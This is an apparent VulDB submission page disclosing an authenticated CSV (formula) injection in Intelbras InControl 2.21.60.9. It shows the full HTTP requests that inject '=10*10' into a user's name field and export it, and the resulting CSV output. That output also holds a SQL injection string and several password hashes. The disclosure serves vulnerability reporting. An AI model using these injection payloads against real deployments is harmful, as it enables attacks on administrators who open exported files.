| Titre | Intelbras InControl 2.21.60.9 CSV Injection |
|---|
| Description | There is an authenticated CSV Injection (also known as Formula Injection) vulnerability in the InControl software. The application doesn't sanitize user input in the /v1/operador/<id> endpoint. This endpoint is used to update user information, such as username, password etc. After updating a user, we can use the export users functionality which can be requested in this endpoint: /v1/operador?separator=SelectedFields&formato=csv&SelectedFieldsnome_operador=Nome%20do%20operador&SelectedFieldsusername=Login&SelectedFieldsgroups=Perfil%20de%20Operador
This is the request that updates a user, note that we've injected the formula "=10*10" in the "nome_completo" parameter, and this will be processed and we will get "100" in the output.
PUT /v1/operador/3 HTTP/1.1
Host: localhost:4441
Content-Length: 849
Authorization: JWT eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.
Accept-Language: pt-BR,pt;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Accept: application/json, text/plain, */*
Content-Type: application/json
Origin: https://localhost:4445
Referer: https://localhost:4445/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
{"id":3,"pessoa":{"id":5,"nome_completo":"=10*10","email":"[email protected]","telefone_celular":null,"telefone_residencial":null,"grupo":null,"imagem":null,"empresa":null,"tem_pendencias":false},"user":{"id":3,"username":"cesara","password":"pbkdf2_sha256$150000$sgWi9Jlst7dj$/3ZnZAgXCpPnBnaDYBH3s9Q/JdUDJWjqjHvX85rIRag=","groups":{"id":4,"name":"Visitante","permissions":[{"id":133,"codename":"add_visitante","content_type":{"id":34,"app_label":"visitante","model":"visitante"}},{"id":134,"codename":"change_visitante","content_type":{"id":34,"app_label":"visitante","model":"visitante"}},{"id":135,"codename":"delete_visitante","content_type":{"id":34,"app_label":"visitante","model":"visitante"}},{"id":136,"codename":"view_visitante","content_type":{"id":34,"app_label":"visitante","model":"visitante"}}]},"is_active":true,"is_superuser":true}}
-------------------------------------------------------------------
Here we have the download request
GET /v1/operador?separator=SelectedFields&formato=csv&SelectedFieldsnome_operador=Nome%20do%20operador&SelectedFieldsusername=Login&SelectedFieldsgroups=Perfil%20de%20Operador HTTP/1.1
Host: localhost:4441
Authorization: JWT eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.
Accept-Language: pt-BR,pt;q=0.9
Accept: application/json, text/plain, */*
Origin: https://localhost:4445
Referer: https://localhost:4445/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
---------------------------------------------------------------- After opening the CSV in Excel we have the following values
nome_completo email telefone_celular imagem username password group is_active is_superuser
pentester [email protected] pentester pbkdf2_sha256$150000$sgWi9Jlst7dj$/3ZnZAgXCpPnBnaDYBH3s9Q/JdUDJWjqjHvX85rIRag= Administrador True True
100 [email protected] cesara pbkdf2_sha256$150000$sgWi9Jlst7dj$/3ZnZAgXCpPnBnaDYBH3s9Q/JdUDJWjqjHvX85rIRag= Visitante True True
' OR '1'='1'-- [email protected] admin2 pbkdf2_sha256$150000$7iR10NcRJoQY$ccO4sUbudTm2Qh+Lq66Thh1YQqvkBTOk8xxCaLugQ3E= Administrador True False
Admin admin pbkdf2_sha256$150000$J0ZQzdvJeF1v$8aOKW77aCwYEEIh/o0zW5oWhOVAnNiKOnvwaPGMFjqw= Administrador True True
|
|---|
| La source | ⚠️ https://localhost:4441/v1/operador/<id> |
|---|
| Utilisateur | lorenzomoulin (UID 33175) |
|---|
| Soumission | 20/06/2025 00:18 (il y a 8 mois) |
|---|
| Modérer | 04/07/2025 08:01 (14 days later) |
|---|
| Statut | Accepté |
|---|
| Entrée VulDB | 314836 [Intelbras InControl jusqu’à 2.21.60.9 /v1/operador/ élévation de privilèges] |
|---|
| Points | 20 |
|---|